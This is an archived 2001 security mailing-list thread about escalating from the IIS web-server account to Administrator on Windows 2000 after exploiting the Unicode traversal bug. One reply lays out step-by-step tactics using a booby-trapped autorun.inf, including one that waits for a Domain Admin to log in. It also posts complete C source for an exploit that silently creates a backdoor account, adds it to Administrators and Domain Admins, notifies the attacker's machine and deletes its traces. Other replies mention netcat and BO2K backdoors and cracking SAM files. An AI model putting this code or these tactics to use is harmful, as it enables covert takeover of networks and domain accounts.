Paul Cardon wrote:
> Charlie Rhodes wrote:
>
>>> We have a win2k where we have access to a cmd.exe with the rights of the
>>> web-server and we would like to obtain administrator rights. Also we
>>> don't have the rights to read the SAM files.
>>> We tried the well-known methdos under win NT 4.0 (like breaknt.exe,
>>> read from raw device) in vain.
>>
>> Do you have network (ftp) access? or floppy access?
>> http://www.bo2k.com should do the trick. You'll probably want to configure
>> the server part off the machine, then load it on.
>
>
> This is the second time this question has been asked on the list and
> almost everybody misunderstands the problem. Let me restate it:
>
> Suppose a pen-tester has used the IIS Unicode vulnerability to download
> a back door such as a netcat listener to the target Win2K server and now
> has a remote cmd shell. At this point the remote shell is running with
> IUSR_<MACHINE> privilege since that is the privilege level that the
> Unicode vulnerability provides.
>
> Now, how does the pen-tester elevate privilege to Administrator?
>
> Any software that is downloaded (tftp, ftp, whatever) through the remote
> command shell will only run with IUSR_<MACHINE> privilege. Why do
> people think that downloading BO2K, netcat, or some such will magically
> elevate privilege? It doesn't.
>
> The only things that are possible are:
>
> 1) There is a known privilege escalation vulnerability that can be
> exploited with local unprivileged access. The attacker can download and
> run that code to gain Administrator access.
You can use another Win2k || NT Machine to execute programs, like:
1 - Copy a "hacked version" of autorun.inf + hacked program to another
Win2K || NT MAchine;
2 - Put the root directory that host autorun.inf in shared mode;
3 - In the IIS Unicode Transversal Machine, mount the shared directory;
4 - Now, you'll see the "hacked autorun.inf" executing arbritary commands.
I think this will hope you...
Another way to do this is:
1 - Find the PDC(if exist) in domain;
2 - Find the "mountable directory" for "Domain Admins";
3 - Put the "hacked autorun.inf" in this directory;
4 - Sit and relax while waiting a member of "Domain Admins" log.
You could do this with a "Shell Folder" vulnerability, and others...
>
> 2) Brute force attack against accounts with local Administrator
> privilege.
You can crack the SAM File, coz the IUSR_<MACH> have permission to read
this file.
>
> 3) Look for vulnerabilities in other systems that the web server can
> talk to. Some of those may expose Domain accounts with Administrator
> privilege on the web server or other systems that are trusted by the web
> server.
>
> There are others but Win2K does limit some of the nicer possibilities
> that existed with NT.
>
> -paul
A source example to "hacked autorun.inf" and program looks like:
--- autorun.cpp
/****************************************************************************************
* Autor : Nelson Brito *
* E-mail : nelson_at_secunet.com.br && stderr_at_sekure.org *
* URL : http://stderr.sekure.org && http://www.secunet.de *
* Data : Belem, 09 de Dezembro de 2000. *
* Publicado: Rio de Janeiro, 09 de Janeiro de 2001. *
****************************************************************************************/
/****************************************************************************************
* Para explorar esta vulnerabilidade voce tera' que usar o seu
cerebro, pois eu nao *
* irei lhe ensinar a como utiliza-lo, estou apenas divulgando o
codigo. *
*
*
* Agradecimentos: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer,
Thiago(c0nd0r), *
* Felipe(falcon), corb_at_sekure(what's up?), Nilson
Brito(brother), *
* Andre Silveira(phD), Charlene(mi amore) e Mamae...
=) *
****************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <process.h> /* A funcao execl() no VC++. */
FILE *fp;
int main(void){
char *windir = (char *)getenv("WINDIR"); // Onde esta o %SystemRoot%?
char *batch = "C:\\TEMP\\nelson.bat"; // Batch File temporario.
/**********************************************************************************
* Sim, eu sei, eu poderia ter utilizado "NetUserAdd()" e
"NetGroupAdd()", mas *
* achei melhor utilizar um arquivo "batch" temporario, fica menor o
codigo. *
**********************************************************************************/
if(!(fp = fopen(batch, "w"))){ perror("fopen"); exit(0); }
fprintf(fp, "@echo off\n");
fprintf(fp, "@%s\\system32\\net.exe user nelson secunet
/fullname:\"Nelson Brito from Security Networks AG / IBQN\"
/comment:\"Penetration Test Account\" /add > nul\n", windir);
/**********************************************************************************
* Aqui voce devera' definir se sera' utilizado em um DC ou Stand Alone.
*
**********************************************************************************/
#ifdef _IS_A_PDC_
fprintf(fp, "@%s\\system32\\net.exe group Administrators nelson /add >
nul\n", windir);
fprintf(fp, "@%s\\system32\\net.exe group \"Domain Admins\" nelson /add >
nul\n", windir);
#else
fprintf(fp, "@%s\\system32\\net.exe localgroup Administrators nelson /add
> nul\n", windir);
#endif
/**********************************************************************************
* Ao final de tudo, sera' enviada uma mensagem para a maquina PITBULL, a
minha *
* maquina. =)
*
**********************************************************************************/
fprintf(fp, "@%s\\system32\\net.exe send PITBULL \"Autorun Privilege
Escalation Exploit Executed\"\n", windir);
fprintf(fp, "@%s\\system32\\cmd.exe /c del %s\n", windir, batch);
fclose(fp);
execl(batch, batch, NULL); // Executando o batch file temporario.
perror("execl"); // Erro de execucao.
return(0);
}
--- autorun.cpp
--- autorun.inf
[autorun]
open=autorun.exe
--- autorun.inf
PS: It's work with PGPDisk, at the mount time. When you mount the
PGPDisk, the SYSTEM recognize as a mount point, then it executes the
"hacked autorun.inf".
Sem mais,
--
Nelson Brito
Security Analyst && Penetration Tester
Security Networks AG / IBQN - http://www.secunet.de/
Received on Jan 10 2001
Intro
